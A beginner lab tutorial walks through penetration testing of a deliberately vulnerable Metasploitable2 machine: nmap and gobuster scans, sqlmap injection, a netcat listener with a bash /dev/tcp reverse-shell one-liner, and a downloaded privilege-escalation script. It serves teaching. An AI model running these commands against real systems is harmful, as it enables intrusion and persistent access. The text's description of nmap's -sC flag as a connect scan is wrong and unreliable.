Web Penetration Testing

CybersecurityCybersecurityBeginner
Practice Now

Introduction

In this lab, we will learn about web application penetration testing, which is a crucial aspect of information security. Web applications are widely used in various domains, making their security a top priority. The lab aims to provide hands-on experience in identifying and exploiting vulnerabilities in a vulnerable web application hosted on a target machine. The objective is to gain an understanding of common web application vulnerabilities and the techniques used to exploit them.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL cybersecurity(("`Cybersecurity`")) -.-> cybersecurity/NmapGroup(["`Nmap`"]) cybersecurity/NmapGroup -.-> cybersecurity/nmap_target_specification("`Nmap Target Specification`") subgraph Lab Skills cybersecurity/nmap_target_specification -.-> lab-416136{{"`Web Penetration Testing`"}} end

Setting up the Environment

In this step, we will set up the lab environment and familiarize ourselves with the tools and target system.

First, we need to get the ID of the Kali Linux image, which can be displayed by double-clicking the xfce terminal on the desktop and running the following command:

docker images

we need to start the Kali Linux container, which will be our attack machine. Open a terminal and run the following command:

docker run -ti --network host image-id bash

This command will start a new Kali Linux container and allow you to interact with its shell.

Next, re-entering a new terminal, we need to start the target machine, which is a vulnerable system called Metasploitable2. Run the following command to start the virtual machine:

sudo virsh start Metasploitable2

Once the virtual machine is running, verify that you can ping the target machine from the Kali Linux container:

ping 192.168.122.102

Reconnaissance and Information Gathering

In this step, we will perform reconnaissance and gather information about the target system using various techniques.

First, we scan the target machine using the nmap tool within the Kali Linux container to identify open ports and running services:

nmap -sV -sC -oN nmap_scan.txt 192.168.122.102

This command will perform a TCP connect scan (-sC) to determine which ports are open, and a version scan (-sV) to identify the service and version running on each open port. The output will be saved to a file named nmap_scan.txt (-oN).

Scanning takes a while. After the scan is complete, review the nmap_scan.txt file to identify potential attack vectors based on the open ports and services using the cat command:

cat nmap_scan.txt

Next, we will perform directory and file enumeration on the target web server using the gobuster tool:

gobuster dir -u http://192.168.122.102 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -o gobuster_scan.txt

This command will brute-force directories and files on the target web server using the specified wordlist (-w). The -t option specifies the number of concurrent threads, and the -o option saves the output to a file named gobuster_scan.txt.

Analyze the gobuster_scan.txt file to identify any interesting directories or files that could potentially provide additional information or attack vectors.

Exploiting Vulnerabilities

In this step, we will attempt to exploit vulnerabilities identified in the previous step.

Based on the information gathered from the nmap and gobuster scans, identify potential vulnerabilities in the target system. For example, if you discovered an outdated version of a web application or service, research known vulnerabilities for that version and attempt to exploit them.

One common vulnerability found in web applications is SQL injection. Let's assume that the target web application is vulnerable to SQL injection. We can use the sqlmap tool within the Kali Linux container to automate the process of detecting and exploiting SQL injection vulnerabilities.

sqlmap -u http://192.168.122.102/vulnerable_page.php --batch --risk=3 --level=5 --random-agent --dbs

This command will attempt to detect and exploit SQL injection vulnerabilities on the specified URL (-u). The --batch option runs sqlmap in non-interactive mode, --risk=3 sets the risk level to 3 (maximum), and --level=5 sets the level for SQL injection tests to 5 (maximum). The --random-agent option specifies a random user-agent string, and --dbs will attempt to retrieve the names of all databases.

Depending on the vulnerability you are attempting to exploit, you may need to use different tools or techniques. Refer to the documentation and resources for the specific vulnerability and tool.

Post-Exploitation and Privilege Escalation

In this step, we will attempt to maintain access and escalate privileges on the target system after successful exploitation.

Assuming you have gained access to the target system through a vulnerability, the next step is to establish a persistent backdoor or reverse shell. This will allow you to maintain access to the system even if the initial vulnerability is patched.

One way to establish a reverse shell is to use the netcat utility. On the Kali Linux container, run the following command:

nc -lvnp 4444

This command will listen on port 4444 for incoming connections.

On the target system, execute the following command to establish a reverse shell:

bash -c 'bash -i >& /dev/tcp/<Kali IP>/4444 0>&1'

Replace <Kali IP> with the IP address of your Kali Linux container. You can use ifconfig to find the IP address of your container.

Once the reverse shell is established, you can attempt to escalate privileges on the target system. One common technique is to search for privilege escalation vulnerabilities using the linux-exploit-suggester tool:

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh > /home/labex/linux-exploit-suggester.txt

This script will analyze the target system and suggest potential kernel exploits that could be used for privilege escalation.

Summary

In this lab, we learned about web application penetration testing and gained hands-on experience in identifying and exploiting vulnerabilities in a vulnerable web application hosted on a target machine. We covered various techniques and tools used in the reconnaissance, information gathering, exploitation, and post-exploitation phases of a penetration testing engagement.

The lab provided a controlled environment to practice real-world scenarios and develop skills in web application security. By following the steps, we learned how to set up the lab environment, perform reconnaissance and information gathering, exploit vulnerabilities like SQL injection, establish a persistent backdoor, and attempt privilege escalation on the target system.

This lab has equipped us with practical knowledge and experience in web application penetration testing, which is essential for securing web applications and identifying potential vulnerabilities before they can be exploited by malicious actors.

Other Cybersecurity Tutorials you may like